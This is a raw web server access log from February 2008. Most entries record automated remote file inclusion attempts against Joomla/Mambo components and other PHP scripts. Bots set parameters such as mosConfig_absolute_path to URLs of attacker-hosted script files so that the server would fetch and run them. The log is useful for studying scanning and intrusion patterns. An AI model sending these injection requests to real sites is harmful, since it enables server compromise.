89.248.168.70 - - [22/Feb/2008:04:00:02 -0800] "GET /logs/access_080211.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.248.168.70 - - [22/Feb/2008:04:00:02 -0800] "GET /logs/access_080211.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.34.169.108 - - [22/Feb/2008:04:00:23 -0800] "GET /logs/access_080211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.biscocanada.com/board//data/trade/1188498966/101/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.48.89 - - [22/Feb/2008:04:00:36 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://hd-t128cl.privatedns.com/~expobell/joomla/images/banners/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.253.49.6 - - [22/Feb/2008:04:01:11 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000292.jpg HTTP/1.1" 200 842640 "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
83.168.205.110 - - [22/Feb/2008:04:01:25 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.168.205.110 - - [22/Feb/2008:04:01:25 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:04:01:31 -0800] "GET /logs/access_080131.log/index.php?body=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:04:01:31 -0800] "GET /logs/access_080131.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:04:01:31 -0800] "GET /index.php?body=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:04:01:31 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:04:01:32 -0800] "GET /logs/index.php?body=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:04:01:32 -0800] "GET /logs/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.172.48.89 - - [22/Feb/2008:04:01:34 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://hd-t128cl.privatedns.com/~expobell/joomla/images/banners/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.111.157.66 - - [22/Feb/2008:04:01:51 -0800] "GET /logs/access_080203.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [22/Feb/2008:04:01:53 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [22/Feb/2008:04:01:53 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.168.205.110 - - [22/Feb/2008:04:01:56 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.5 - - [22/Feb/2008:04:02:11 -0800] "GET /logs/access_080211.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:04:02:25 -0800] "GET /logs/access_080203.log/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:04:02:25 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:04:02:26 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:04:02:27 -0800] "GET /logs/access_080203.log/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:04:02:27 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:04:02:27 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:04:02:35 -0800] "GET /logs/access_080203.log/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:04:02:36 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:04:02:36 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:04:02:39 -0800] "GET /logs/access_080203.log/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:04:02:39 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [22/Feb/2008:04:02:40 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.254.214.3 - - [22/Feb/2008:04:03:02 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.126.66 - - [22/Feb/2008:04:03:11 -0800] "GET /logs/index2.php?p=http://nkdb.org//AsaMall/makeup/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.126.66 - - [22/Feb/2008:04:03:11 -0800] "GET /index2.php?p=http://nkdb.org//AsaMall/makeup/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.116.117.149 - - [22/Feb/2008:04:03:15 -0800] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.116.117.149 - - [22/Feb/2008:04:03:15 -0800] "GET /logs/access.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.116.117.149 - - [22/Feb/2008:04:03:15 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.116.117.149 - - [22/Feb/2008:04:03:16 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.116.117.149 - - [22/Feb/2008:04:03:16 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.116.117.149 - - [22/Feb/2008:04:03:17 -0800] "GET /logs/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.25 - - [22/Feb/2008:04:03:43 -0800] "GET /logs/access_080211.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [22/Feb/2008:04:03:43 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:04:03:49 -0800] "GET /logs/access_080117.log/index.php?body=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.22.101.222 - - [22/Feb/2008:04:03:49 -0800] "GET /logs/access_080117.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.193.224.20 - - [22/Feb/2008:04:04:14 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kaiba.t35.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [22/Feb/2008:04:04:15 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kaiba.t35.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [22/Feb/2008:04:04:15 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kaiba.t35.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [22/Feb/2008:04:04:15 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kaiba.t35.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [22/Feb/2008:04:04:15 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kaiba.t35.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [22/Feb/2008:04:04:16 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kaiba.t35.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [22/Feb/2008:04:04:17 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kaiba.t35.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [22/Feb/2008:04:04:17 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kaiba.t35.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [22/Feb/2008:04:04:18 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kaiba.t35.com/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.111.157.66 - - [22/Feb/2008:04:04:46 -0800] "GET /logs/access_071225.log//oneadmin/photogallery/include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [22/Feb/2008:04:04:52 -0800] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [22/Feb/2008:04:04:52 -0800] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [22/Feb/2008:04:05:10 -0800] "GET /logs/access_080201.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.74.131 - - [22/Feb/2008:04:05:11 -0800] "GET /logs/access.log/index.php?sourcedir=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.74.131 - - [22/Feb/2008:04:05:11 -0800] "GET /index.php?sourcedir=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.74.131 - - [22/Feb/2008:04:05:11 -0800] "GET /logs/index.php?sourcedir=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:04:05:15 -0800] "GET //oneadmin/photogallery/include.php?path[docroot]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:04:05:17 -0800] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:04:05:18 -0800] "GET //oneadmin/photogallery/include.php?path[docroot]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.214.80.254 - - [22/Feb/2008:04:05:18 -0800] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.168.74.131 - - [22/Feb/2008:04:05:21 -0800] "GET /logs/access_080122.log/index.php?sourcedir=http://h1.ripway.com/frizza/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.111.157.66 - - [22/Feb/2008:04:05:38 -0800] "GET /logs/access_080131.log//oneadmin/photogallery/include.php?path[docroot]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.96.148.200 - - [22/Feb/2008:04:06:09 -0800] "GET /logs/access_080203.log/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.96.148.200 - - [22/Feb/2008:04:06:09 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.96.148.200 - - [22/Feb/2008:04:06:09 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:04:07:18 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:04:07:18 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.191.43.42 - - [22/Feb/2008:04:07:19 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:04:07:33 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:04:07:33 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.226.103.41 - - [22/Feb/2008:04:07:34 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.108 - - [22/Feb/2008:04:08:03 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.239.78.91 - - [22/Feb/2008:04:08:16 -0800] "GET //?mosConfig_absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 200 2962 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
222.239.78.91 - - [22/Feb/2008:04:08:17 -0800] "GET /errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.189.211.227 - - [22/Feb/2008:04:09:37 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.189.211.227 - - [22/Feb/2008:04:09:37 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.189.211.227 - - [22/Feb/2008:04:09:38 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [22/Feb/2008:04:09:51 -0800] "GET /logs/access_071220.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [22/Feb/2008:04:09:51 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.96.148.200 - - [22/Feb/2008:04:10:20 -0800] "GET /logs/access_080203.log/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.96.148.200 - - [22/Feb/2008:04:10:20 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.96.148.200 - - [22/Feb/2008:04:10:20 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.94 - - [22/Feb/2008:04:10:48 -0800] "GET /logs/access.log HTTP/1.0" 200 19383 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:10:57 -0800] "GET /logs/access.log/index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:10:58 -0800] "GET /index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:10:58 -0800] "GET /logs/index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:11:00 -0800] "GET /logs/access.log/index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:11:00 -0800] "GET /logs/access.log/index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:11:00 -0800] "GET /index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:11:00 -0800] "GET /index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:11:01 -0800] "GET /logs/index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:11:01 -0800] "GET /logs/index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:11:01 -0800] "GET /logs/access.log/index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:11:01 -0800] "GET /index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:11:02 -0800] "GET /logs/index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.159.97.10 - - [22/Feb/2008:04:11:06 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cifa.ro/images/flag.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.159.97.10 - - [22/Feb/2008:04:11:06 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cifa.ro/images/flag.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.159.97.10 - - [22/Feb/2008:04:11:06 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cifa.ro/images/flag.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.159.97.10 - - [22/Feb/2008:04:11:07 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cifa.ro/images/flag.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
18.55.2.206 - - [22/Feb/2008:04:11:47 -0800] "GET /index.php?option=com_mp3player&Itemid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
18.55.2.206 - - [22/Feb/2008:04:11:47 -0800] "GET /logs/index.php?option=com_mp3player&Itemid=&mosConfig_absolute_path=http://nybap.org/templates/rose.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.111.157.66 - - [22/Feb/2008:04:12:04 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:13:52 -0800] "GET /logs/access_080118.log/index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:14:09 -0800] "GET /logs/access_080118.log/index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:14:10 -0800] "GET /logs/access_080118.log/index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.146.204.11 - - [22/Feb/2008:04:14:12 -0800] "GET /logs/access_080118.log/index.php?get=http://nastatku.eu/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.28.71 - - [22/Feb/2008:04:15:05 -0800] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.116.117.149 - - [22/Feb/2008:04:15:22 -0800] "GET /logs/access_080120.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.116.117.149 - - [22/Feb/2008:04:15:23 -0800] "GET /logs/access_080120.log/errors.php?error=http://www.flagstaffsaloon.be/home/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.19.178.201 - - [22/Feb/2008:04:16:25 -0800] "GET /logs/access_080108.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [22/Feb/2008:04:16:25 -0800] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [22/Feb/2008:04:16:25 -0800] "GET /logs//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.180.163 - - [22/Feb/2008:04:16:59 -0800] "GET /logs/access_080108.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
